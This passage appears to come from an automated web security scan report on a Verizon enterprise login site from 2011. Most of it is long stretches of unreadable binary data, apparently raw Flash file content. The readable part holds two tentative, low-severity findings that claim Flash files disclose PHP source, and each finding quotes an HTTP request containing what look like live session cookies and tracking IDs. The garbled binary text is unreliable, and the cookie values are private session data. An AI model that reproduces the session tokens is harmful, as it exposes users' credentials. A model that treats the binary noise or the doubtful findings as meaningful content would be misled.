.7u...lW..c......k....(.X...
.... 6...........i.+...r.".u...h.&.XT.JC....^..pa.A"..wE..5...?R..mBflh..<.o.l.....rmJ_Zz.
*;4....A...6q..`(.....}lc\.....c.....[o....5..w1....q.T$.$..t{5...RK......J.......O.Vt.JC.u....@AI......~............*o...p]..B.~..}.e.y..9.p]c.....}Y;d.pq.d(.%.OuE'..+8.....he].....[Ci.|..dz8.........5<i.D.g.2.S~.uf5{......4%R.Do..?Ql...c.j..w0....#....=wX.P.....+.(...R.kH.dDRe[A...W..W. .7=.]rtC..[d...W.<..D.~x7..s.E.Z6C..l.....r.x.2..}...g....op|...D.%.....]Z...I..]}...'....,...B..a..2...`.]..
..R2.Nr.B....*R&Cf..O.....?.n.B...$.`..nwf.^.[.rtMH`...A...1.....).p[x..F7.r..bQ!...#1..2Ik...-.i/..>...<.... ...r....M,.....K.w=x....@.7b...h.D..y`G..D.R[.....k>E.....H._....f.....s......&H.L..)~....lX...t....rz~^M..DC..T..!..._.....be.5.....M..W0..c.    ..l..VmZ......y./P.....[}S..R....-N.4...a...........JJ.(.....s...
M.....U..-Q..X+a.9C...w).I]...%Q....'.W............rL...#.;.....kkk.....v.    .k......x..SM4.....f......Rns...?.`........y.v..)..i..$.\/#..    ...F.tK"...3.}.g.%|z<.p..P..^.Y.A......F....o....s.Z.GZ...j2..*.=ku...Zt......2~..E..1r.~ 3$"lf.
.f`6........)z...a...h..Vv..0D.".<o..T..I....;Db.wAr...
...@..f..~.s.[.W..!.........M....Z...Si......5x....../?.....7Z.........g..M..a..:.o........].._.9&:..s..9..h.>.H...+..f.=Xv${$ku>S).F...._...(..NN^.A..-,...-.u....S... ...e..]..*...b4i`.c.*......~....W.&s.xPVS...~.......3t...5...G...z......x......^...4(*.r..E...8uW.SC.k..o,.h..
7..s.C.y5.$q.R$B9.
c.i6q{.d.w...wZ.Sx9.q(..{.....l....^...e.)Q.:N.....*S...w`Rp.(.?x.....wg{n(......h.'.....x.....G..n..R5v.3......` P...H.@.SSx...l.........=k.2.C~.............W......C..K........N.u.....l_}#<.x.5l...;h..8.pc.TD.    Y[h.Ud...x...H..)....0.o,.nps%...?....u..IU.{..$....Y...`l%..]....A.....f..h...[.u...........-6...0..s.>X..]gq.Q.
.....o[.M.I......#k...7q.....]..S.L..e...e.H...@...N..y..x.L5.x.ck.|......P..6..."t]s..g.Q....../.xcd...k.@....4m....&.7.)G b?2]r...Rne....w.w|[.gL........-.S-...Q+.2.8.n5..7s=R...D/..].^    ...j...4;...$.cI...F'....H...(....'.z..tHw..1D..S}..g!....k7P.TH....,..&.........p...^..|V-.......).c..X.b.=..L.*.M.4V...ahK..:._.........l..N..bc.O...I.......9..Gu..
.....u...S..._..{...F..:....\..e.u]M...Y.o.@....L."S.SZ.......34.....J.{,..%.K..$...}.ep.Z.>..LOs..X*4V....x*4SQ....:&.hK..!f..O.......Gle.gqP&9.....H.x...Z!..[...m.Ao.....^.7...V..GP..$..-...4.''...^w...2).U..Z.<3,T.Z....*..j..;.G...7..$&.-e......;."j|.`.E....&.E .( ..`..*..5v.q+.........hA.....!.....c.(3....'7m../.;p.*m#.. .....N..6/.^.C.....|Q..&W...5....c..e..Y~..A,FJ>).M./...*...!)...Bk.=Z.;......    .[.u0......fU.
S.J..w.j..]!#-...L....Bl..'Z....ZD...f...'.A.@...d.9...o..E...V5..Fj........7r.}......{+Tm..&.......kf\]..E..Y.^9.}.3(..m.<.w....R..7n$....$F..a..w/o..S..N.k..L..7..Yw.....{...4...C.p._f....|&+...T..uf....8']e..u.j.%.....6...U.....v....l..~....;..O...)~........X[>P...[.<..l.(.. .of!.P...R)}F...0.8(.........O..H....._.R
...O..H.......W.Ex..s./\.?..<]k......ZA..uD.O>..'...F.3.z.....e..........R6.n..R...Jg.$m....c.....Tw...?.S=../..
...? .......@.66....?d.....`..L.}]B.<Y....Y.....r.........l.
.b...O1c:`..N.
.7.+p0qmq.q.......P...1.)6....r W..,..q...\.v.:l..C....}..K...A..'@0{
...n...fN.8...%d.IQa.0....;[.o......L..(.N.."...3>Yr...2.->..=..~.Y.fs.&{x.1.C.a&.Q{..,........xW...?...g..59<.....]5.g.=..E.8...@...?..\...`.W.?..L..3...8L8.z.....fY..e.XX.....0.L.T...L..6..M_.<...Dr.*..v...P.._8.T..A...=`..Z..\.....#.V..KK`....M..... )....c^.6.g.\*..A8,..,.\T. ....]u....a...E~......H...o........s..)7..../.I.*....g....,pE8#kok......
...IFm...$pJO    ..M.#\..U.....*.
....V.........U.PKI.U.G.!.n+H.`....".{!3.....3..6tW...H%...;..    fN4...{~..=.....0...    |`R...(..|[l.]..?b.p[..%.45..j..b>.w.o..)..CK....K.#Q.j...v).2,........,.@O....O..;..`.w..2.//......?.........0....b......... C...TS..q.;...........`.HdH8....<t..}.....dJ....e.:...............\(.....l.....I..\..V.1.1o...._.. ..ho.g....k3P...&.5.4.q..............UY..=a....]...[.....2..q.e.j...u..H4..d...~z<>h..C.k..in.......|..%.5...f.....J............U.L,...|-].^.fjC.....:$a..xH.Jw...<.....4..`,......0.[.....<y.....o.Ykc...X..o...........l>H8......w.N........rc...m...hA.....j~..~k.    .......A....`...V.......
p..>d*.|...(...Y.....R..}.:..V.;f...R..J......w.)
.bB..%k;Y....!..I...`.,...m.K.h.9.^......??4..2.....L..R.+.?.....L......;.~.....~.>.:m......)L(..+p2}..q.!..    .S....I.?{#..s..E.    ...v]-.t..^6K.nE.X=.h;.
.I.qK...<{v...L.....4a.g..zO.-ZqdW.....}Di....~.\..%d.XM.D.n.....x.
.:?.....Fr{%...ro..    ..X.....@.0...J.V..hjT\...#..Wf}A.(...#._.....F
..![.p]-..5.../G.&.-........j...@Y6...kt.NBU..R...W.F...LM).8..T-..~....sp.M-.o.y_y......-.......f..H.h-J..._..9...!&U.?.....;..q.G...Qe$Ed.l=.&...8H..$...e....4...~.^.&.. ..n
...Yj.
?.........a..}.....T1d.6.q4c......)......j.0.._.&yp7..;..V.I[0.W.AE......(..=z....#..Di.... .F+.>.%.k.....W..\.....n*..*c....k=.....CKL.i....6.3V...*P.:p..8J.&.+.......>...h.m.....$8......+..>>....n>......q..m..S.j.j....`....a_.N.k6.*].@.<n<.....K.Y....:.D..0\aI.0......=W.[M.......r.,..N..*...y....Du....]...3W...J.EsM.......<...E.Kk...k....#....Gy....0.7.2.IX..%.. .L,.uJN..n..U....o....A...v....$t5.w..$.V.....(^...29\.SL..J.m\..dH...O...rl..5.    ...K.........W-]...jA.J#f.,..x.G......Co....J.a.0..../..v}.........`............'....~.?.....d..?2F....o.XV......0.R..j...........H....od,...o........o....._.#........"...f$.;:..s..O_.S..+..&..Qb|.RbJ^.!.....Y...YL\..m.9...x;..z:.(;..<.d.........gQpwg.W.?._G?G.@G.~.........h.    ^.......*......OT..l.|fT..n.E}VQ../.z....E.....L........bd......@    j.}.e...]......Lq.Y,..    .6...v\E.b<.]|>.s.}.:.).+.Vr.z...f...@P.. .........@3PjT}...>u./O.:...(..`....7.hzd#y......p{In......Gt.....,......B....y....'.&.....V../....ex.........&y......a<    .M8.H.;f..Tl.LH..u...hV.....D.`...r}.......Z.._....Z....1..4.`...............d@L...........(.V.KV.....j..=K........*L.....W.a.1.Q....t...0......&Y..--b....).(#.......MJ,-.|]..E8.K.?..4...!]...N..u5....u..=H......u4.D.)Qs...X..F.Hp.8..    5=...A..].....:}...NC..{...c7.m...%09.0.......j7.{e.......r."..`....8.....Z,2.*Lx..........s,.0Z .%r)p6..j_..l.n.].._.L..6p j&.E...NPyj...r.._..8.R`..:.....e.*.].c...W...N..a.t..Z.93.dLf.....+..D.$...7....E.._...Y.q....>s$y......J.+.......n.-.)Tl?...eM....i.^.K............/...&"......w9...k2J0.T.I..........nC]...k.X....Y{b..g..T.k~e...|....d.e......x....<.........|$    .......... +..L._Y.R3c.F...eQ.... ........'X(j.#.i.Z...T.2=.3.3K=.c..9##@C..".6.l.N...e..hZ.v._.........7..%H./.L_.eAAq.M.S.|.xO.|.....#vt.%G.w8....\.1.....k...A...T..DB......../....L..v\k%+
:eGl.^.#...#n.Qq.G1....G..K....n....<.R..%px(...P..tb..S....../..i..5...X..~E9... 4..M17...@|..60....p..q..R.8E..........K....D..f..6f5..?\!J.s.$.T...r
.hr...xC-\o|...=...k..E.N.....    .....C.L....;.....;.wKp.....f.W.^.{.s.}..v.;ZcP..Y...U.U......CWQ#=.%.X..~.E..L..x......G...|.B..UN.J.Q.L.......s%U@..hbTdU.....[...j.K..w-..Ux..^G2-..Ro...... .GZ.."...T..u.....(...G..?.xf.....8.5....fY..J...H..r.g..t.N0]...L.@............-........-t.....x.... .~........3;.X.........u....3RUbrS.{.....zl...R.U=.2~.y.Y....*.../ :..H......Q.......O.j.S...E..BT+!..).W..O]..i....al.l.T.....F..]...n).l.S.......D..+..O-.....U.......!...y.T..y..Q$..9...................#..)...@.h...h6..h.......!&_hH....@..............gNn....-..Z.8.;...[[8:.Z[.?70.<..>=3q......Z..?..?.`...g.ogj.....,mjeNK..>4t.o....AB$..r....G.t...QB~
~.?.?AGHA.UH.R.t.*......_....@?.    ...V..A.......9.9.....k._..!!.|.#..*......a.BE'..v..I..J.F2...=..)VC...A.......Z.....?.@.......'.H.p#...H. @.?#...J.J.T..GZ.....;.......~....2$....i.....
....._O|.a&?.....Dp.!H.;....7.I.;.O.(......E@......8.......-.?;.B..    .`.;..YG.L.    .a.`.?s=.*.
.e.
..x.    ....v.J.....e0.)..v!5pW...h.A...........o8.....pB,.........g._`1 ..|....0.!.......d..3 .....dB.....@^...0 ......H.........X..Q:....&    d...`..;..140u..`....v.v...AEB5A.@.<......R.t..NI.H...p...o.
...?..b0.. ..c%...J(....LK........ '..'.G>..b.P.._m8Q.B....n]t....V..K..n....=...}".j......]....$....;.J7..T.%..".U..T.........p..^.J.U....C......b..6..m..K....r.a.
...#(w.s.......D.S..6.3.../".q%A..>.|.Mg.C;..*.....f.l..t.a._.+.!.2.^....@0......)}...[..T>..........|S+.t..).H..].
|..`oc....w..l...d.t..".P.JOvY.;....9...5vW....w.zX|....}.b ..... gI..^e....t.V...lWpR.l['......7r.Q..H......e.....2..cZ..bY........\.^..
E.u]....Y......;C.K    ..#.Wz../..5.......a..Z.................NO........GF..`.Eb.X.`.`.......A.K0/+.<@.(X...`.\...X..7..d.p.v.. /:......O...\.....(c..1I.Pk.....r..t...R.}.T./*Ni..(._..VD..UD........?F./....?...o4gA.x.@.@...dp!.4UX.'.....CA... ^..........B..v.....?'.......B..............33{..f..og.B.......~....O....p[....b..T.
.0..!...?.G..z..{!..U...Z..\....n..H...._|.A.....R..'w..q.X....o.c.....%.....sk..E.....*...e....%.._)J    ...]...?,D..ls=ax.o.=..p....z......K;..?...F.....;.......o.d.?...../v..I.4.A!..;.?.y..d.....A...........7._.....g.k.3=.._..BB$@.$.......L`'..-..D&....A...X...S.P.FU...j.|..O..?|....?...|..Fe..N..J._...wTr.......d?......'..V.&..z6.....rfo.ga..v.7..............."...P..r..3.."DRLB....Q.An.................    .....r.......>..j@.~8....}.....bx...............O...].m.."....@Q...P0.P.]?h..a.....q! ..?..E...|....=.$P8(88XD88.
.0d..@.$.bA...Q...d..eS....R.e>z........S%.Uv.....?DP?....0..<.,..4".SA...
.........GM    ...@..$g.Q......e....xE..T..........=..[{..P` .1`0.!.....a.a....a..T.a.{.......|..*8..    F..._.=...`....q.eB:..t.........X......=.....Z...c5[...#.b.$....5\9}...].....c~..),[G......~.s..k3..[..T......a.]..;.. B|f...j.r..>....3j.....]*.p..    .....U[2n....I.....42....B^.'eR!..w...l...........r....V.."F....Haa;8..8.*....8.Liv....F.o...U..T..
...)...@..d.u...]..'2Ct.3y......(.G.Q6.....O+5EG.|....i..5..0...F{....d.....}G.`.v.1.u.Ld4.t....K..y.;...{...E..W;.(...A5./.......^..G...... ..m.Q`_..di.._...P'....VG..6..^......T......~.1..&..6.j4M.T:e.<.sOQ.e..uP8..Xc...U.|....Th.'s....3...+.:.6..b.Q.2.{49?G%...D.....pO.Y.a3.C.?>
.h...Bq....v.j.7s...8..............w....,.....;...-... .L..5....D.5.;HxNO0Me.&....K...k..S.e.Iw..............Y?..N;H..d.?\RU.....X.Y....t.....2 .sJ..F}$....V....*>
...[SNIP]...

12.8. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"11c07-4e228aaf"
Vary: accept-encoding
Content-Length: 72711
Date: Mon, 05 Sep 2011 22:26:50 GMT
Connection: keep-alive

CWS
...[SNIP]...

12.9. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"193cb-4e228aaf"
Vary: accept-encoding
Content-Length: 103371
Date: Mon, 05 Sep 2011 22:26:22 GMT
Connection: keep-alive

CWS
...[SNIP]...
2.q...    lV.....K.=..m..L.y.=)qP.A$.....L....h..r}."O..).=..    ...2..G=8.........Q..g... .n.M.go.b.>..tpT....#.^..W..$e.o. 7.c..}......bL.2.`.r........|..y..S`j.k-...X....!t.......R.w.......>...+81u..P. .U..r..-..U...!.N.Df8.E...&042V;Jl"!..v....c*..#. .Z.nM...v.I.....d.o...ZX.aA...d:..B:xK.!....u....b.}...Jh..J..A....<    -...q.a.).4..i2.ypO"...6.[.v.AJhG.J..&.H.[%..\.<..x....G.!....|9.H.^..\.[....Z.+    .....<.c.u.3..........Z......2..L.s.$e.".d...~P.\-......u..!c.....W!.*.O.S..6    v.{...4    .%....    .y.3.gp... 5....o..z....J.UY    .$#&Q#.:..K.........P...j..$.O........M".Ks~Q...JQS.......A:..n    m.>..*{H.K.a...J...J...t....g.k.S...V.......o%..eH.+.2.J_..p..d.T.......yH.+.J.........Q&H5.[.Q..k.^.X.U.\..C:....`An..E..E:h.<Z.m0..Z......x.S.=Y..1.....P...m..l.    aE.T.e.9N%.c.G.5./..q5. } t{@.......%..7;......h.\[.p...Y.......E.?.....<P..K$*..V..J.\..PN-l..=D..k...X..ywRP..jJH.[.b.D..3a.:.b.........lfX..."T..5j..'..bt($.}.....^..&4.:N..g.R.m...vC:..S5rE.C:..D..*.:..2...\..vY.5.'.m    r.A.....+\ap.a.....`...B!9.d    r3......."wY.S...Z8...v
.P..........k........2VnZ..    .a...T.RGg/w....
+.F...yB..Ct...t..aJ.fx/....m&......$....W+.!....oWOnf.w..f.C;..S....{....Y.SrM....I..C..5K.....r34..N`T=C:....q$.a')....(Y.3..t.g..2.    ....    .!.u
...P._....rZ..5oL..x...t"....8..s2.\..j_hG..AnV..v..S......&b..y?5.4..:.....zua.D.m....q.."..X1..X.,B......T<.4".)....uH.J."....W....keCBR...    T..W,.eY.?..pRB?.J.9.....'.....S....)....I..X..b$6BJ.c!.f..&..$@.F.+e...(..j...:...;.K..c.#....1e.C...Dy3.!..^)s..<4.t.k.".....k. ./s...,J.X].T.4....7............].Z..j+8..*..=....r......P..=...AU..lz/...it.{2b wi.....+....l.2V.2./%L    .....]>    .......h.Z[r..,B.T..A....B:.#......An.Or.B..
........zF*.*M.G..9...n%j.....-$'.....Y...
... 7....... ...B......Mz..x.C
......#.Q+....*e.md....+l.........v...I.w...U:-v...Vh...R,....m.%W....-.%W.!..fC.....^..n...!e4?.8...x..Rj4...+C.2...B..M..`^.@..j.J..i7/.....!..F...x......E..w....]..S..ht.|!.h....:..T......Gy.'WrE..y.....65ZuX.i.Gf;..(...~.]"......u..Rgj....Qa...t.N...<.L.]"........v.|Ae%W.9.M.S..83R..7..0.b....O2D.:..<.6M....>}C.U.a .=u...zH...-...\....eO..L...5.M.K...5....L....m..".([m.C.j+ce.T<A).+...&T..].V.
.JtHY.T.Ej{v*.......]`...$......I..9)#..`M.....r.j.x..... 1...b..A.R...TpD...^04.LJ.:........r.b..QpDG.|9.`w.Ep.'l.;)...!cE....R....$Q..A.L..D"(... ,!.O....@(....Kp......(.pO...&...V_.....m...r!RF.$........u.7....t<=..%'.... ##.B.Gx.g.Ro...P...a...cT<i.`.+vB..{.I.7.[.....JQ|..+.....4.hG.r.<..L..x.jF.$...^....d....%...InO...`w......Ez....R.N..I..EVl.N...X.....+._..Ku.d...A.-.s..0.2`....)."b...^.;...v.....xW.w!*)..vxw,B.P:..V...Uj...............&.^.>....Zm..........R+...h.. jk5:......H...m...._.-.R.............J.*.4..E.z..8....dlqMA..X..IG"B..A...u>....[m...\..
.or)...D.j...,...%..0.Vp.(/.....U4.k.(,.,..k&h...R*+kCH........Qr..sqy...r......._SYV9JL.......    ....eE.U.fx......Z]a~a)..!...[.OM.eE..]|.U..j..t.Zj...b0.e.    .h.H...........VUT..k..\^.`.....GMXU]\..{.....[V\X^V..u+..@..jp....yq,....u.........[.    ............h.....{...E.    *...dV.. ........~...Pq.W.j..:j"H.gF....Q.......{t.U.e...$)/.........U..JY.|.0.M6........
...A..U..L...;.h.~.).B}*"..-c].G.....6.o.:....Y.".N[SV.....oP|.1.w..`..........R.....Y..e.2....|...D........Z>..ou)$58.B...0.. ......>"...j..N.    ..Ct.......QB.4...OXS&J.....n..5"/.n.d..
1u(...C..2...\....e.....-..qu)c _.1V..x...]n    ...}    m3^.}<(8.R.f*....0....2u.!.T...!c....^5.|c.T.(..F...@B{.....(..@...\n.!W,.{Y.rw B.+.}.6.......k _.rR....,.e...JmqMe~...4.rT1..).'.L.._.d...,.be..l1b..
....W...-.R..+....x.!.....;W_NkU.<.....
.....>.\F.Q+8....m...U...-...Ku...%...@...]v?T<..b...H...QJ....U.....2V.T<..2..H.(8v
.z.XgCVO.4..:W3.F"...ahG..`.[6
..#GYP..X..1........\.GqmuQ..XL....R]M~....QJ..G...TUk.R,-.,..........x.z+.J..=#m.......=.~.EUF..gt........x...;...#.2%...@.7..LB.........\lD.....T3...3.2.......a8....8!.Y/D8+h.....h ..I......!.[....K..
........7.~a.A..W.=.......5ka.    0..EE.O.V..{T1.xE...Yb2..E.... ._....d#......GT.Y.&....!c1...P...L....C........".B.Y...W..,.......B8l...6O)...;..^.6Q{......h2.\b.`.    u...G.R....`_.P..,.../p..K..E.-.l.{....D
^.**2...p.G....%.L.:..g.T..bp3..'K.^O.o    ..U.1.$E...I1.....`..W"w............GI.....8:....
.l....8,........q@....i..0..x"..U>.;V_..P....J..QU....#.(.8.....X.]..Xi....[...0b..A.-1..<1&    .X..0.A..8....=..+../.}'..8...I).zK......%'......f.^.GD.I....yiiC.....!.%.    .....A.zHa.@. .0_S.......-.C_.U..|..<..7......d....R5.K8U.DAR...l..`(.(.^#..~...(.C9.....*...3.8..&p.L..sXz.|..[&\.DuR
7..t.,.7K.....2f.t.{.?.d./..B..'".F}3......79....z..O.T..........Qhu...K..N.;.    *.."<aL.(...:.E.|a2..8b..ix.~...`a.)z....3..y.ao..p....>^M..$..................8=+...C...s...{m..x4w..Fp....ON..A.N..KT...j..T..6@......I../=#.S-..1...o......~.u..=.N.J......4.au.i.:....:............5.......C..3M.^..x...x....2X..n.X..$.D.    ....k.QN.....Z.c..{...1.....6.....[i..._Z..Kp..8p1..]...a..........I....5...nF._.....{.......KCw.
.I.h.5u...R.......,.>......2q...'....(Fw.v...._2..Rcb.....Y...j...S.w..YXU[^T...K.*.pmi1...vS.L.L..{QU..V.....8<.Q],.rZ..nr...P'...)<.d.    .Xk.-..N...#O .K....&.._9....."t..l4.........A.z.....I"4..{.'....U...........g...e......l....S.N..."..@..T#..e...z<../...D0hA...0..CN.dX.........'v...q.\.....$...D.8i8.......Q.b.:...{.[6xbH..P......#.M\.Mp..q....x........F.....t.8.tE.g.J    p.R.'>4C...D!Z.U..(.k...V...4.t...Bhs..J..c......ZM.Az..d.F...Dh...>dzF:EL.+.....     {..CB    
.b.'...\b...\h..&.....I.>..)...J.H..:t%.......)..A......=B.}..b#.."......3.-....Q..D...../..?........[......D.D......y...*a.~.((.EA6./%.......3P./..P.x.... .Rt.r:"<h    '&I.`2...hV.l..Q...B...QgQ..*...d....$tm..d..K..Q./b...F.@-..=.nb...p...$.S%..TCL.C=!qZ.FS.#X.6N..[.h.......h@GK`.@W..$'.c`]C.H.    7...qE..*(..+.`....J.6w...7....H".*..T..H^
..xa....h.J..Ix..D..)...7    Q..i!. U.....C......?#P'g.....^].....JU f..h.P.Gj.']... ..yb.."X)...I.:1)...rbR0_......=...mbR..>|b..Qj.Gt.Z..%.LHc .u.&RC.......LR#A. k..b...V...g........QY8 @|$E......N.......".....D..|.k..<]j.......    .GOL
...?.u...R.V....%.X.....@B.>.t.R....F.5H... .Rt]..J..a..!n....E..s..a2...D....,\    O..0........J.. .f4.9F*.t...l...
....Z.....$.t,H3.    q.....w..<.q..b..wH..P".P.B5...K-!.h.    n.L60....U.FAI
:}...D3.-..\\Q=......20..>    q%VJ.T."..?...    ....J...>..E.6I.....9..^T:.....b..H..z...uhEtP/X.........Q. M.J....6........av.-G.Q.....3....&g.R...    I.3p..f.!n..Y8%$..    ..a-....B@i.l..]t-z....&j+.....>0.&)..va.."I.......2.|..?..Z...tH`Q!..z..g....H.`jU}....u)..).....P..`...a..:R.....Q.@b.H2P...p..A!|...e....h........#L..]RU    .f...#.tp..r.A.n...D.C.I.... h.....1..r...gz..J=.......!%~..f..>...VG.o..-h.L.:..+.u,n!.#    .!u.N.G.S    ..i...{ax....Y....bCp.W.X;...B....U..[q#.
..z.........G:pZ....8.5b5.>......QX.O..SOi".'c..d`<..eAs..$.U..k....u.xFkF...f$Tvd..2N..i....@.&....h..I\E.....`.....a"...D.L.....P...g..6.\..@5..Q...d...R..E..Y
.4.@....I.J+2.0R..>..IJ?.....~.D.#.
a.2..l......x
..&..D..    ..n.....5K..S..Y..MU.D. ...oP.D2....R..R..I..:xu.M.e.. $&.H.x....prU.Wge...z_....L9...,H.4ZI..l..Z.b......78....
)%`.8.J.U.N.bJ>GFa.<..,....k.7}k...6.lt...W.}.+&...TD.0'......6........r...tA..lm..H............:...u.....}.x...........UAZ.W..8....C...;.l.....c;..'$a..D$......."D.Et....D.B..{.....3[$...yBX.s.=..s.....l..h|Z..PY...M..ld.{.-..H..%.yZ..r..~I(.....jz..t.7"..`5......Z. _m....X.m....M..J..o..-Z+...-...l.RI.j)..QiZ.5..H..$.....e.f...+...hK6_.c-xZ.='k....t../.....{..7..q'....{..WI.....{...8......K,.A#/.Kx.,.^~&..p..w.....u.....q.......YjK.6(.v..od./.da.Oif..!.....>..'.........2N#...K.A.yh.m..,..h..IZ.....qIlm..)..9..wTU......Bf...........?.........W...mUK..i).......F.k.%.F....od;R2...F3x.........&zI...'....a.g|v\,zM....6.O....N~..V8........,9...o.=S.....t.;.;....0^.
...fM..../$. L'..LKN../.........=.1../a..U....L..........~.>...EL.z..4"..Q=..i.@O....=.F3.VyIh.T...'.......`>.Ko...dt.......^..=%.=C.,0r7..D...P.N5/<.KZofZJZ..i..@.    .-..H....5m..........J.........cO<.L..H.....-..o..Ze.".W|(......z[T..H.V.K......n....._.x...#.2.....7.0>Y.e........_O..O....[....=...'.l..!....$6J.....X._q&.^.4.n..!|Y.ndG.s..,C..7......8.Dm...W!...
.........M...Ms..UKz...I..zj5n-.....A...iz.    .-Xc.b.......D......kYf...X..~...t...
.o....!'C.!...*.6.F...d...h>..xe.^5.....L/1.....u..Do.wx.Oo...N.4m..b....|........ZCq...P......&zq".lR..b........
.C..."9...._.I0.|Y.....J.9............Q....!k..........gH.....0.,..*}..#O..P.i..'..g28.[...`......./..~1......5
n\.OM.....@...\q..QA...V..,.q..YBY.7....b..[c...^...T........
..k..GV..I.^z..Y.'...}KG...f.....1.Jl..Ve..j.>.5....c..|5"..7.`V...#.j....N>n.3..^....a~.......I1..1.............=C.j.|Lr.t1e.%..p..r....4..W...[...U.v.Z.VM..
ZO...x...c.|..&..[.)..........).P.L.J....s.....yv..Z......J.y..H..g.p..Q0...(...X}....p....RurD$.0.y:.......Tx.W...ze.&.G..kI'..
